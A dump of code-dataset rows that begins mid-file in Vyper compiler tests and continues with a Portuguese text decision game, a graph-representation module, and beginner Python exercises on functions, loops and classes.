self.s = "moo3"
raw_log([], self.s)
def ioo(inp: bytes <= 100):
raw_log([], inp)
"""
c = get_contract(loggy_code)
c.foo()
assert s.head_state.receipts[-1].logs[0].data == b'moo'
c.goo()
assert s.head_state.receipts[-1].logs[0].data == b'moo2'
assert s.head_state.receipts[-1].logs[0].topics == [0x1234567812345678123456781234567812345678123456781234567812345678]
c.hoo()
assert s.head_state.receipts[-1].logs[0].data == b'moo3'
c.ioo(b"moo4")
assert s.head_state.receipts[-1].logs[0].data == b'moo4'
print("Passed raw log tests")
def test_test_bitwise():
test_bitwise = """
def _bitwise_and(x: num256, y: num256) -> num256:
return bitwise_and(x, y)
def _bitwise_or(x: num256, y: num256) -> num256:
return bitwise_or(x, y)
def _bitwise_xor(x: num256, y: num256) -> num256:
return bitwise_xor(x, y)
def _bitwise_not(x: num256) -> num256:
return bitwise_not(x)
def _shift(x: num256, y: num) -> num256:
return shift(x, y)
"""
c = get_contract(test_bitwise)
x = 126416208461208640982146408124
y = 7128468721412412459
assert c._bitwise_and(x, y) == (x & y)
assert c._bitwise_or(x, y) == (x | y)
assert c._bitwise_xor(x, y) == (x ^ y)
assert c._bitwise_not(x) == 2**256 - 1 - x
assert c._shift(x, 3) == x * 8
assert c._shift(x, 255) == 0
assert c._shift(y, 255) == 2**255
assert c._shift(x, 256) == 0
assert c._shift(x, 0) == x
assert c._shift(x, -1) == x // 2
assert c._shift(x, -3) == x // 8
assert c._shift(x, -256) == 0
print("Passed bitwise operation tests")
def test_num256_code():
num256_code = """
def _num256_add(x: num256, y: num256) -> num256:
return num256_add(x, y)
def _num256_sub(x: num256, y: num256) -> num256:
return num256_sub(x, y)
def _num256_mul(x: num256, y: num256) -> num256:
return num256_mul(x, y)
def _num256_div(x: num256, y: num256) -> num256:
return num256_div(x, y)
def _num256_gt(x: num256, y: num256) -> bool:
return num256_gt(x, y)
def _num256_ge(x: num256, y: num256) -> bool:
return num256_ge(x, y)
def _num256_lt(x: num256, y: num256) -> bool:
return num256_lt(x, y)
def _num256_le(x: num256, y: num256) -> bool:
return num256_le(x, y)
"""
c = get_contract_with_gas_estimation(num256_code)
x = 126416208461208640982146408124
y = 7128468721412412459
assert c._num256_add(x, y) == x + y
assert c._num256_sub(x, y) == x - y
assert c._num256_sub(y, x) == 2**256 + y - x
assert c._num256_mul(x, y) == x * y
assert c._num256_mul(2**128, 2**128) == 0
assert c._num256_div(x, y) == x // y
assert c._num256_div(y, x) == 0
assert c._num256_gt(x, y) is True
assert c._num256_ge(x, y) is True
assert c._num256_le(x, y) is False
assert c._num256_lt(x, y) is False
assert c._num256_gt(x, x) is False
assert c._num256_ge(x, x) is True
assert c._num256_le(x, x) is True
assert c._num256_lt(x, x) is False
assert c._num256_lt(y, x) is True
print("Passed num256 operation tests")
def test_selfcall_code():
selfcall_code = """
def foo() -> num:
return 3
def bar() -> num:
return self.foo()
"""
c = get_contract(selfcall_code)
assert c.bar() == 3
print("Passed no-argument self-call test")
def test_selfcall_code_2():
selfcall_code_2 = """
def double(x: num) -> num:
return x * 2
def returnten() -> num:
return self.double(5)
def _hashy(x: bytes32) -> bytes32:
return sha3(x)
def return_hash_of_rzpadded_cow() -> bytes32:
return self._hashy(0x636f770000000000000000000000000000000000000000000000000000000000)
"""
c = get_contract(selfcall_code_2)
assert c.returnten() == 10
assert c.return_hash_of_rzpadded_cow() == u.sha3(b'cow' + b'\x00' * 29)
print("Passed single fixed-size argument self-call test")
def test_selfcall_code_3():
selfcall_code_3 = """
def _hashy2(x: bytes <= 100) -> bytes32:
return sha3(x)
def return_hash_of_cow_x_30() -> bytes32:
return self._hashy2("cowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcowcow")
def _len(x: bytes <= 100) -> num:
return len(x)
def returnten() -> num:
return self._len("badminton!")
"""
c = get_contract(selfcall_code_3)
assert c.return_hash_of_cow_x_30() == u.sha3(b'cow' * 30)
assert c.returnten() == 10
print("Passed single variable-size argument self-call test")
def test_selfcall_code_4():
selfcall_code_4 = """
def summy(x: num, y: num) -> num:
return x + y
def catty(x: bytes <= 5, y: bytes <= 5) -> bytes <= 10:
return concat(x, y)
def slicey1(x: bytes <= 10, y: num) -> bytes <= 10:
return slice(x, start=0, len=y)
def slicey2(y: num, x: bytes <= 10) -> bytes <= 10:
return slice(x, start=0, len=y)
def returnten() -> num:
return self.summy(3, 7)
def return_mongoose() -> bytes <= 10:
return self.catty("mon", "goose")
def return_goose() -> bytes <= 10:
return self.slicey1("goosedog", 5)
def return_goose2() -> bytes <= 10:
return self.slicey2(5, "goosedog")
"""
c = get_contract(selfcall_code_4)
assert c.returnten() == 10
assert c.return_mongoose() == b"mongoose"
assert c.return_goose() == b"goose"
assert c.return_goose2() == b"goose"
print("Passed multi-argument self-call test")
def test_selfcall_code_5():
selfcall_code_5 = """
counter: num
def increment():
self.counter += 1
def returnten() -> num:
for i in range(10):
self.increment()
return self.counter
"""
c = get_contract(selfcall_code_5)
assert c.returnten() == 10
print("Passed self-call statement test")
def test_selfcall_code_6():
selfcall_code_6 = """
excls: bytes <= 32
def set_excls(arg: bytes <= 32):
self.excls = arg
def underscore() -> bytes <= 1:
return "_"
def hardtest(x: bytes <= 100, y: num, z: num, a: bytes <= 100, b: num, c: num) -> bytes <= 201:
return concat(slice(x, start=y, len=z), self.underscore(), slice(a, start=b, len=c))
def return_mongoose_revolution_32_excls() -> bytes <= 201:
self.set_excls("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
return self.hardtest("megamongoose123", 4, 8, concat("russian revolution", self.excls), 8, 42)
"""
c = get_contract(selfcall_code_6)
assert c.return_mongoose_revolution_32_excls() == b"mongoose_revolution" + b"!" * 32
print("Passed composite self-call test")
def test_clamper_test_code():
clamper_test_code = """
def foo(s: bytes <= 3) -> bytes <= 3:
return s
"""
c = get_contract(clamper_test_code, value=1)
assert c.foo(b"ca") == b"ca"
assert c.foo(b"cat") == b"cat"
try:
c.foo(b"cate")
success = True
except t.TransactionFailed:
success = False
assert not success
print("Passed bytearray clamping test")
def test_multiple_levels():
inner_code = """
def returnten() -> num:
return 10
"""
c = get_contract(inner_code)
outer_code = """
def create_and_call_returnten(inp: address) -> num:
x = create_with_code_of(inp)
o = extract32(raw_call(x, "\xd0\x1f\xb1\xb8", outsize=32, gas=50000), 0, type=num128)
return o
def create_and_return_forwarder(inp: address) -> address:
return create_with_code_of(inp)
"""
c2 = get_contract(outer_code)
assert c2.create_and_call_returnten(c.address) == 10
expected_forwarder_code_mask = b'`.`\x0c`\x009`.`\x00\xf36`\x00`\x007a\x10\x00`\x006`\x00s\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00Z\xf4\x15XWa\x10\x00`\x00\xf3'[12:]
c3 = c2.create_and_return_forwarder(c.address)
assert s.head_state.get_code(c3)[:15] == expected_forwarder_code_mask[:15]
assert s.head_state.get_code(c3)[35:] == expected_forwarder_code_mask[35:]
print('Passed forwarder test')
# TODO: This one is special
print('Gas consumed: %d' % (s.head_state.receipts[-1].gas_used - s.head_state.receipts[-2].gas_used - s.last_tx.intrinsic_gas_used))
def test_multiple_levels2():
inner_code = """
def returnten() -> num:
assert False
return 10
"""
c = get_contract_with_gas_estimation(inner_code)
outer_code = """
def create_and_call_returnten(inp: address) -> num:
x = create_with_code_of(inp)
o = extract32(raw_call(x, "\xd0\x1f\xb1\xb8", outsize=32, gas=50000), 0, type=num128)
return o
def create_and_return_forwarder(inp: address) -> address:
return create_with_code_of(inp)
"""
c2 = get_contract_with_gas_estimation(outer_code)
try:
c2.create_and_call_returnten(c.address)
success = True
except:
success = False
assert not success
print('Passed forwarder exception test')
def test_list_tester_code():
list_tester_code = """
z: num[3]
z2: num[2][2]
z3: num[2]
def foo(x: num[3]) -> num:
return x[0] + x[1] + x[2]
def goo(x: num[2][2]) -> num:
return x[0][0] + x[0][1] + x[1][0] * 10 + x[1][1] * 10
def hoo(x: num[3]) -> num:
y = x
return y[0] + x[1] + y[2]
def joo(x: num[2][2]) -> num:
y = x
y2 = x[1]
return y[0][0] + y[0][1] + y2[0] * 10 + y2[1] * 10
def koo(x: num[3]) -> num:
self.z = x
return self.z[0] + x[1] + self.z[2]
def loo(x: num[2][2]) -> num:
self.z2 = x
self.z3 = x[1]
return self.z2[0][0] + self.z2[0][1] + self.z3[0] * 10 + self.z3[1] * 10
"""
c = get_contract(list_tester_code)
assert c.foo([3,4,5]) == 12
assert c.goo([[1,2],[3,4]]) == 73
assert c.hoo([3,4,5]) == 12
assert c.joo([[1,2],[3,4]]) == 73
assert c.koo([3,4,5]) == 12
assert c.loo([[1,2],[3,4]]) == 73
print("Passed list tests")
def test_list_output_tester_code():
list_output_tester_code = """
z: num[2]
def foo() -> num[2]:
return [3, 5]
def goo() -> num[2]:
x = [3, 5]
return x
def hoo() -> num[2]:
self.z = [3, 5]
return self.z
def joo() -> num[2]:
self.z = [3, 5]
x = self.z
return x
def koo() -> num[2][2]:
return [[1,2],[3,4]]
def loo() -> num[2][2]:
x = [[1,2],[3,4]]
return x
def moo() -> num[2][2]:
x = [1,2]
return [x,[3,4]]
def noo(inp: num[2]) -> num[2]:
return inp
def poo(inp: num[2][2]) -> num[2][2]:
return inp
def qoo(inp: num[2]) -> num[2][2]:
return [inp,[3,4]]
def roo(inp: num[2]) -> decimal[2][2]:
return [inp,[3,4]]
"""
c = get_contract(list_output_tester_code)
assert c.foo() == [3,5]
assert c.goo() == [3,5]
assert c.hoo() == [3,5]
assert c.joo() == [3,5]
assert c.koo() == [[1,2],[3,4]]
assert c.loo() == [[1,2],[3,4]]
assert c.moo() == [[1,2],[3,4]]
assert c.noo([3,5]) == [3,5]
assert c.poo([[1,2],[3,4]]) == [[1,2],[3,4]]
assert c.qoo([1,2]) == [[1,2],[3,4]]
assert c.roo([1,2]) == [[1.0,2.0],[3.0,4.0]]
print("Passed list output tests")
def test_internal_test():
internal_test = """
@internal
def a() -> num:
return 5
def returnten() -> num:
return self.a() * 2
"""
c = get_contract(internal_test)
assert c.returnten() == 10
print("Passed internal function test")
def test_minmax():
minmax_test = """
def foo() -> decimal:
return min(3, 5) + max(10, 20) + min(200.1, 400) + max(3000, 8000.02) + min(50000.003, 70000.004)
def goo() -> num256:
return num256_add(min(as_num256(3), as_num256(5)), max(as_num256(40), as_num256(80)))
"""
c = get_contract(minmax_test)
assert c.foo() == 58223.123
assert c.goo() == 83
print("Passed min/max test")
``` |
{
"source": "01ch01/developer-inc",
"score": 4
} |
#### File: 01ch01/developer-inc/main.py
```python
from os import name, system
from variables import *
# define global variables
inventory = {
"health": 10,
"money": 10,
"social": 10,
"fame": 10,
}
scenarios = [
scenario01,
scenario02,
scenario03,
scenario04,
scenario05,
scenario06,
scenario07,
scenario08,
]
def clear_console(): system('cls' if name == 'nt'else'clear')
def choose():
decision = 'null'
while(decision != 'false' and decision != 'true'):
decision = input((f'\n\tVocê aceita (true) ou recusa (false)? '))
decision = decision.lower().strip()
if decision == 'true':
return True
elif decision == 'false':
return False
else:
print('\n\t⚠️ Por favor, digite apenas "true" ou "false" ⚠️\n')
def showMenu():
print("""\n
*********************
** DEVELOPER, INC. **
*********************
---------------------
| 0 - Iniciar jogo |
| 1 - Créditos |
| 2 - Sair |
---------------------
\n""")
def is_player_alive(inventory):
flag = True
for item_value in inventory.values():
if item_value <= 0:
flag = False
return flag
def show_inventory():
global inventory
print(f"""\n
STATUS ATUAL:
Saúde: {inventory['health']}
Dinheiro: {inventory['money']}
Vida social: {inventory['social']}
Fama: {inventory['fame']}
""")
def start_game():
global scenarios
global inventory
reset_inventory(inventory)
for scenario in scenarios:
if is_player_alive(inventory) == False:
game_over()
break
print(scenario)
boolean_answer = choose()
if scenario == scenario01:
if boolean_answer:
inventory['health'] -= 2
inventory['money'] += 2
inventory['social'] -= 3
inventory['fame'] += 1
else:
inventory['health'] += 1
inventory['money'] -= 4
inventory['social'] += 1
inventory['fame'] -= 1
clear_console()
show_inventory()
elif scenario == scenario02:
if boolean_answer:
inventory['health'] += 2
inventory['money'] -= 4
inventory['social'] -= 0
inventory['fame'] += 2
else:
inventory['health'] -= 2
inventory['money'] += 4
inventory['social'] += 0
inventory['fame'] -= 2
clear_console()
show_inventory()
elif scenario == scenario03:
if boolean_answer:
inventory['health'] += 1
inventory['money'] -= 5
inventory['social'] += 2
inventory['fame'] += 2
else:
inventory['health'] -= 3
inventory['money'] += 4
inventory['social'] -= 4
inventory['fame'] -= 3
clear_console()
show_inventory()
elif scenario == scenario04:
if boolean_answer:
inventory['health'] -= 9
inventory['money'] -= 6
inventory['social'] += 8
inventory['fame'] += 5
else:
inventory['health'] += 4
inventory['money'] += 8
inventory['social'] -= 4
inventory['fame'] -= 3
clear_console()
show_inventory()
elif scenario == scenario05:
if boolean_answer:
inventory['health'] += 9
inventory['money'] -= 8
inventory['social'] -= 0
inventory['fame'] += 0
else:
inventory['health'] -= 9
inventory['money'] += 8
inventory['social'] += 0
inventory['fame'] -= 0
clear_console()
show_inventory()
elif scenario == scenario06:
if boolean_answer:
inventory['health'] += 5
inventory['money'] += 2
inventory['social'] += 8
inventory['fame'] -= 8
else:
inventory['health'] -= 3
inventory['money'] -= 2
inventory['social'] -= 4
inventory['fame'] += 3
clear_console()
show_inventory()
elif scenario == scenario07:
if boolean_answer:
inventory['health'] -= 10
inventory['money'] += 8
inventory['social'] -= 11
inventory['fame'] += 10
else:
inventory['health'] += 5
inventory['money'] -= 7
inventory['social'] += 2
inventory['fame'] -= 5
clear_console()
show_inventory()
elif scenario == scenario08:
if boolean_answer:
inventory['health'] -= 2
inventory['money'] -= 10
inventory['social'] -= 3
inventory['fame'] += 5
else:
inventory['health'] += 1
inventory['money'] += 4
inventory['social'] += 1
inventory['fame'] -= 8
clear_console()
show_inventory()
# clear_console()
pass
clear_console()
end_game()
def reset_inventory(inventory):
for item in inventory.values():
item = 10
def main():
while True:
showMenu()
menu_option = input("\n\tEscolha uma opção: ")
if menu_option == '0':
clear_console()
presentation()
clear_console()
start_game()
elif menu_option == '1':
clear_console()
show_credits()
elif menu_option == '2':
clear_console()
bye()
break
else:
print('\n\tFavor inserir uma opção válida!\n')
if __name__ == "__main__":
main()
``` |
{
"source": "01ch01/implementacao-grafos",
"score": 4
} |
#### File: 01ch01/implementacao-grafos/main_functions.py
```python
import os
def clear_console(): os.system('cls' if os.name == 'nt' else 'clear')
def create_graph():
graph = {}
qtd_vertices = int(input("Insira o número de vértices: "))
for i in range(qtd_vertices):
graph[i+1] = []
while True:
clear_console()
print('\n*** Digite "-1" para terminar a criação do grafo ***\n')
v1 = int(input('Insira um vértice: '))
if(v1 == -1):
break
v2 = int(input('Insira o vértice que se conecta: '))
graph[v1].append((v1, v2))
# graph[v2].append((v2, v1))
return graph
def load_graph():
file = open('grafo.txt', 'r')
qtd_vertices = int(file.readline())
graph = {}
# writing vertices in graph
for i in range(qtd_vertices):
graph[i+1] = []
for line in file:
line.split('\n')
v1 = int(line[0])
v2 = int(line[2])
graph[v1].append((v1, v2))
file.close()
print('\n\tGrafo carregado com sucesso!\n')
return graph
def save_graph(graph):
file = open("grafo.txt", "w")
stream = list()
qtd_vertices = str(len(graph.keys()))
stream.append(qtd_vertices+'\n')
for edges in graph.values():
for edge in range(len(edges)):
line = str(edges[edge])
# remove stuff
line = line.replace(")", "")
line = line.replace("(", "")
line = line.replace(" ", "")
line += '\n'
stream.append(line)
file.writelines(stream)
file.close()
print(f'\n\tGrafo salvo com sucesso!')
def get_vertices(graph):
vertices = []
for vertex in graph.keys():
vertices.append(vertex)
return vertices
def get_edges(graph):
edges = []
for i in graph.values():
for j in range(len(i)):
edge = i[j]
edges.append(edge)
return edges
def adjacency_matrix(graph):
vertices = get_vertices(graph)
edges = get_edges(graph)
matrix = [[0 for _ in vertices] for _ in vertices]
for edge in edges:
v1 = int(edge[0])
v2 = int(edge[1])
matrix[v1-1][v2-1] = 1
# mirror diagonals
matrix[v2-1][v1-1] = 1
return matrix
def incidence_matrix(graph):
vertices = get_vertices(graph)
edges = get_edges(graph)
matrix = [[0 for _ in edges] for _ in vertices]
for vertex in vertices:
count = 0
for edge in edges:
if(edge[0] == vertex and edge[1] == vertex):
value = 2
elif (vertex in edge):
value = 1
else:
value = 0
matrix[(vertex-1)][count] = value
count += 1
return matrix
def adjacency_list(graph):
vertices = get_vertices(graph)
edges = get_edges(graph)
adjacency_list = {}
for vertex in vertices:
neighbors = []
for edge in edges:
if (vertex in edge):
neighbor = edge[1 if(vertex == edge[0]) else 0]
neighbors.append(neighbor)
adjacency_list[vertex] = neighbors
return adjacency_list
def show(graph):
print(f' Vértice\tAresta(s)\n')
for vertex, edge in graph.items():
print(f'\t{vertex}:\t{edge}')
``` |
{
"source": "01coders/50-Days-Of-Code",
"score": 4
} |
#### File: 50-Days-Of-Code/python_MA1/day_12.py
```python
def tax(bill):
"""Adds 8% tax to a restaurant bill."""
bill *= 1.08
print ("With tax: %f" % bill)
return bill
#2
def tip(bill):
"""Adds 15% tip to a restaurant bill."""
bill *= 1.15
print ("With tip: %f" % bill)
return bill
meal_cost = 100
meal_with_tax = tax(meal_cost) #108.00
meal_with_tip = tip(meal_with_tax) #124.20
#Functions 3
def square(n):
"""Returns the square of a number."""
squared = n ** 2
print ("%d squared is %d." % (n, squared))
return squared
square(10) #100
#4
def power(base,exponent):
result = base ** exponent
print ("%d to the power of %d is %d." % (base, exponent, result))
power(5,3) #5 to the power of 3 is 125.
#5
import math
print(math.sqrt(25)) #5.0
#from math import * //imports all math functions
#6
def biggest_number(*args):
print (max(args))
return max(args)
def smallest_number(*args):
print (min(args))
return min(args)
def distance_from_zero(arg):
print (abs(arg))
return abs(arg)
biggest_number(-10, -5, 5, 10)
smallest_number(-10, -5, 5, 10)
distance_from_zero(-10)
#OUTPUT
#10
#-10
#10
```
#### File: 50-Days-Of-Code/python_MA1/day_14.py
```python
def hotel_cost(days):
return 140 * days
def plane_ride_cost(city):
if city == "Charlotte":
return 183
elif city == "Tampa":
return 220
elif city == "Pittsburgh":
return 222
elif city == "Los Angeles":
return 475
def rental_car_cost(days):
cost = days * 40
if days >= 7:
cost -= 50
elif days >= 3:
cost -= 20
return cost
def trip_cost(city, days, spending_money):
return rental_car_cost(days) + hotel_cost(days) + plane_ride_cost(city) + spending_money
print (trip_cost("Los Angeles", 5, 600))
#1955
#Break & Continue
count=0
result=0
for count in range(1,10):
result=result+count
if result>6:
break
print("result=",result) #result=10
count=0
for count in range(0,10):
if count<5:
continue
print(count) #5,6,7,8,9
```
#### File: 50-Days-Of-Code/python_parikshith21/Day30.py
```python
class vehicle:
def __init__(self,wheels,capacity,fuel):
self.w=wheels
self.c=capacity
self.f=fuel
def display(self):
print(self.w,self.c,self.f)
car=vehicle(4,15,'petrol')
car.display()
car=vehicle(4,5,'diesel')
car.display()
# =============================================================================
# #output:
# 4 15 petrol
# 4 5 diesel
# =============================================================================
bike=vehicle(2,5,'petrol')
bike.display()
# =============================================================================
# #output:
# 2 5 petrol
# =============================================================================
class vehicle:
def __init__(self,wheels=0,capacity=0,fuel='diesel'):
self.w=wheels
self.c=capacity
self.f=fuel
def assign(self,wheels,capacity,fuel):
self.w=wheels
self.c=capacity
self.f=fuel
def display(self):
print(self.w,self.c,self.f)
car=vehicle(4,5,'petrol')
car.display()
# =============================================================================
# #output:
# 4 5 petrol
# =============================================================================
bike=vehicle()
bike.display()
# =============================================================================
# #output:
# 0 0 diesel
# =============================================================================
auto=vehicle()
auto.display()
# =============================================================================
# #output:
# 0 0 diesel
# =============================================================================
```
#### File: 50-Days-Of-Code/python_parikshith21/Day36.py
```python
class Date:
def __init__(self,day,month,year):
self.__day=day
self.__month=month
self.__year=year
def get_day(self):
return self.__day
def get_month(self):
return self.__month
def get_year(self):
return self.__year
def set_day(self,value):
self.__day=value
def set_month(self,value):
self.__month=value
def set_year(self,value):
self.__year=value
class customer:
def __init__(self,name,num,dob):
self.__name=name
self.__num=num
self.__dob=dob
def get_name(self):
return self.__name
def get_num(self):
return self.__num
def get_dob(self):
return self.__dob
def set_name(self,value):
self.__name=value
def set_num(self,value):
self.__num=value
def set_dob(self,value):
self.__dob=value
d=Date(13,11,1998)
c1=customer("Manoj",7204444566,d)
print(c1.get_name(),c1.get_num(),c1.get_dob().get_day()) #Manoj 7203344566 13
temp=c1.get_dob()
print(temp.get_day()) #13
temp.set_year(1999)
print(temp.get_day(),temp.get_month(),temp.get_year()) #13 11 1999
c1.get_dob().set_year(2000)
# =============================================================================
# #output:
# Manoj 7204444566 13
# 13
# 13 11 1999
# =============================================================================
``` |
Subsets and Splits